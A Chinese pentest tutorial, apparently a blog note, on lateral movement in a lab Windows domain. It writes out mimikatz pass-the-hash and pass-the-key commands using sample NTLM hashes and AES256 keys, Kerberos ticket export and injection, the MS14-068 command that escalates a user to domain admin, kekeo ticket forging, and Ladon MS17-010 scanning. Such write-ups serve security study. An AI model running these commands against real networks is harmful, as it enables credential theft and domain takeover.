内网安全-域横向PTH&PTK&PTT哈希票据传递

内网安全-域横向PTH&PTK&PTT哈希票据传递_第1张图片

PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试
PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试
PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试
pth:没打补丁用户都可以连接,打了补丁只能 administrator 连接
ptk:打了补丁才能用户都可以连接,采用 aes256 连接

内网安全-域横向PTH&PTK&PTT哈希票据传递_第2张图片

案例 1-域横向移动 PTH 传递-mimikatz

PTH ntlm 传递

未打补丁下的工作组及域连接:
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
\\OWA2010CN-God.god.org

mimikatz查询出本机NTLM后,通过本机的NTLM值连接域内其它主机(如果设置的密码相同,即可连上)
内网安全-域横向PTH&PTK&PTT哈希票据传递_第3张图片执行后,弹出一个cmd窗口,可输入对应要连接主机的ip,连接并执行命令(可对内网存活主机的ip依次进行测试)
内网安全-域横向PTH&PTK&PTT哈希票据传递_第4张图片

案例 2-域横向移动 PTK 传递-mimikatz

对方主机必须打了补丁,用户才可连接
通过mimikatz获取aes256值后,进行连接

PTK aes256 传递
打补丁后的工作组及域连接:
sekurlsa::ekeys #获取 aes

sekurlsa::pth /user:mary /domain:god
/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

内网安全-域横向PTH&PTK&PTT哈希票据传递_第5张图片

案例 3-域横向移动 PTT 传递-ms14068&kekeo&本地

#PTT 攻击的部分就不是简单的 NTLM 认证了,它是利用 Kerberos 协议进行攻击的,这里就介绍三种
常见的攻击方法:MS14-068,Golden ticket,SILVER ticket,简单来说就是将连接合法的票据注入到
内存中实现连接。
MS14-068 基于漏洞,Golden ticket(黄金票据),SILVER ticket(白银票据)
其中 Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术
MS14-068 造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是
kb3011780

第一种利用漏洞:

能实现普通用户直接获取域控 system 权限


#MS14-068 powershell 执行
1.查看当前 sid whoami/user

2.mimikatz # kerberos::purge
清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list  查看当前机器凭证
mimikatz # kerberos::ptc 票据文件  将票据注入到内存中

3.利用 ms14-068 生成 TGT 数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -
p admin!@#45

4.票据注入内存
mimikatz.exe "kerberos::ptc [email protected]" exit

5.查看凭证列表 klist

6.利用
dir \\192.168.3.21\c$

当获取到并连接域中的一个普通用户时,获取本地sid值
内网安全-域横向PTH&PTK&PTT哈希票据传递_第6张图片
MS14-068.exe -u [email protected] -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
通过MS14-068执行后会生成一个TGT开头的文件(票据)
内网安全-域横向PTH&PTK&PTT哈希票据传递_第7张图片
通过mimikaze将生成的票据注入到内存中,可通过klist命令查看
内网安全-域横向PTH&PTK&PTT哈希票据传递_第8张图片
查看域控制器名字,直接进行连接

内网安全-域横向PTH&PTK&PTT哈希票据传递_第9张图片
内网安全-域横向PTH&PTK&PTT哈希票据传递_第10张图片
第二种利用工具 kekeo

1.生成票据
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看凭证 klist
4.利用 net use 载入
dir \\192.168.3.21\c$

运行kekeo执行命令后生成一个kirbi后缀文件
内网安全-域横向PTH&PTK&PTT哈希票据传递_第11张图片
导入生成的kirbi文件票据,导入后直接连接
在这里插入图片描述

第三种利用本地票据(需管理权限)

利用mimikatz导出以前建立连接过的票据
再把以前连接过的票据重新导入,去连接尝试

sekurlsa::tickets /export
kerberos::ptt xxxxxxxxxx.xxxx.kirbi

导出以前建立过连接的票据
内网安全-域横向PTH&PTK&PTT哈希票据传递_第12张图片
将导出的票据重新导入,尝试连接
内网安全-域横向PTH&PTK&PTT哈希票据传递_第13张图片

总结:ptt 传递不需本地管理员权限,连接时主机名连接,基于漏洞,工具,本地票据

案例 4-国产 Ladon 内网杀器测试验收

信息收集-协议扫描-漏洞探针-传递攻击等

扫描在线主机
内网安全-域横向PTH&PTK&PTT哈希票据传递_第14张图片
检测网段中是否存在ms17010漏洞
内网安全-域横向PTH&PTK&PTT哈希票据传递_第15张图片
扫描网段中是否开发445端口,可以进行smbscan的连接

内网安全-域横向PTH&PTK&PTT哈希票据传递_第16张图片
连接192.168.3.21主机
内网安全-域横向PTH&PTK&PTT哈希票据传递_第17张图片

你可能感兴趣的:(渗透笔记2,安全)